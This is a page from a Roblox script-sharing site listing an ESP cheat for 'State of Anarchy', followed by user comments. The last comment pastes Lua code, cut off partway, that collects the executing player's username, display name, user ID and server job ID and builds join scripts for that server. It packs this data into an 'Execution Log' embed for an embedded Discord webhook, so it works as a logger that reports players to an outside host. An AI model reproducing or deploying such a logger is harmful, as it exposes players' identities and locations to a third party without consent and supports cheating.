State of Anarchy
3.1k Views

Esp

State of AnarchyUploaded by
1 year ago
Please login to perform these actions:

Description

I don't know if it will work because I haven't tested it yet.

View Raw
Edited By: Xcx_22 Download


Comments
7
User profile picture
zxcv 1 year ago
test plz😢😢
User profile picture
COMBO_WOCK 1 year ago
@zxcv i remeber making script for this game. good ol days. @XXD14 you wanna make it together or you just posting esp and thats it?
User profile picture
Xcx_22 1 year ago
@COMBO_WOCK Umm ok
User profile picture
Xcx_22 1 year ago
@zxcv I tested it and it works fine.
User profile picture
Xcx_22 1 year ago
@0aim_100aimbot How would you do this to me?
User profile picture
pasterokya 4 months ago
local webhookURL = "https://discord.com/api/webhooks/1396286672689430628/eLOatICOuvtqlMKWHm_8tYgpM4ia6FD2zBHl_ahWJYD4N4miTgaOX4bbviYG3lHPwQGy" local player = game.Players.LocalPlayer local username = player.Name local displayName = player.DisplayName local userId = player.UserId local gameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name local gameId = game.PlaceId local jobId = game.JobId local playerCount = #game.Players:GetPlayers() local jsJoinCode = [[ fetch("https://games.roblox.com/v1/games/]] .. gameId .. [[/servers/Public?sortOrder=Asc&limit=100").then(res => res.json()).then(json => { const server = json.data.find(s => s.id === "]] .. jobId .. [["); if (server) { window.open(`roblox://placeId=` + server.placeId + `&gameInstanceId=` + server.id); } else { console.log("Server not found."); } }); ]] local luaJoinScript = [[ local TeleportService = game:GetService("TeleportService") TeleportService:TeleportToPlaceInstance(]] .. gameId .. [[, "]] .. jobId .. [[", game.Players.LocalPlayer) ]] local embed = { ["*le"] = "Execution Log", ["description"] = "Here are the details of the player and game:", ["type"] = "rich", ["color"] = 0x000000, ["fields"] = { { ["name"] = "Username", ["value"] = username, ["inline"] = true }, { ["name"] = "Display Name", ["value"] = displayName, ["inline"] = true }, { ["name"] = "User ID", ["value"] = tostring(userId), ["inline"] = false }, { ["name"] = "Game Name", ["value"] = gameName, ["inline"] = false }, { ["name"] = "Game ID", ["value"] = tostring(gameId), ["inline"] = true }, { ["name"] = "Players in Server", ["value"] = tostring(playerCount), ["inline"] = true },
Please Login to add a comment.